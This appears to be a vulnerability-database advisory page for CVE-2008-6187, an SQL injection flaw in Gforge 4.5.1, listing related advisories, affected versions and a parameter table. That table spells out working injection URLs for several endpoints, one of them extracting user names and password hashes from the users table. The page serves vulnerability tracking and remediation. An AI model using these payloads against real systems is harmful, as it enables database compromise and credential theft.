Lucene search
K

CVE-2008-6187

🗓️ 19 Feb 2009 18:00:00Reported by mitreType 
cve
 cve
🔗 web.nvd.nist.gov👁 59 Views🌐 WEB

SQL injection vulnerability in Gforge 4.5.1

Related
Detection
Refs
Paths
ReporterTitlePublishedViews
Family
Circl
CVE-2008-6187
9 Oct 200800:00
circl
Cvelist
CVE-2008-6187
19 Feb 200918:00
cvelist
EUVD
EUVD-2008-6157
7 Oct 202500:30
euvd
NVD
CVE-2008-6187
19 Feb 200918:30
nvd
OpenVAS
Debian: Security Advisory (DSA-1698-1)
13 Jan 200900:00
openvas
OSV
DSA-1698-1 gforge - SQL injection
9 Jan 200900:00
osv
Prion
Sql injection
19 Feb 200918:30
prion
seebug.org
GForge多个SQL注入漏洞
20 Feb 200900:00
seebug
UbuntuCve
CVE-2008-6187
19 Feb 200918:30
ubuntucve
NVD
Node
gforgegforgeRange4.5.19
OR
gforgegforgeMatch3.0
OR
gforgegforgeMatch3.1
OR
gforgegforgeMatch3.2
OR
gforgegforgeMatch3.3
OR
gforgegforgeMatch3.21
OR
gforgegforgeMatch4.5
OR
gforgegforgeMatch4.5.11
OR
gforgegforgeMatch4.5.14
OR
gforgegforgeMatch4.5.16
ParameterPositionPathDescriptionCWE
offsetquery paramnew/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summarySQL injection via unsafely filtered input in new endpoint (offset/limit/group_id) leading to remote command execution.CWE-89
limitquery paramnew/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summarySQL injection via unsafely filtered input in new endpoint (offset/limit/group_id) leading to remote command execution.CWE-89
group_idquery paramnew/?group_id=&limit=50&offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summarySQL injection via unsafely filtered input in new endpoint (offset/limit/group_id) leading to remote command execution.CWE-89
offsetquery paramnews/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+usersSQL injection via unsafely filtered input in news endpoint (offset/limit/group_id) leading to remote command execution.CWE-89
limitquery paramnews/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+usersSQL injection via unsafely filtered input in news endpoint (offset/limit/group_id) leading to remote command execution.CWE-89
group_idquery paramnews/?group_id=&limit=50&offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+usersSQL injection via unsafely filtered input in news endpoint (offset/limit/group_id) leading to remote command execution.CWE-89
offsetquery paramtop/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;SQL injection via unsafely filtered input in topusers endpoint (offset) leading to remote command execution.CWE-89
release_idquery paramfrs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*SQL injection via release_id (and pub_sql) parameter in frs/shownotes.php.CWE-89
pub_sqlquery paramfrs/shownotes.php?release_id=*/+--+454&pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*SQL injection via release_id (and pub_sql) parameter in frs/shownotes.php.CWE-89
skill_edit[]query parampeople/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&MultiEdit=EditSQL injection via unsafely filtered skill_edit[] parameter in people/editprofile.php.CWE-89
Rows per page

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Jun 2026 23:01Current
8.6High risk
Vulners AI Score8.6
CVSS 27.5
EPSS0.01314
59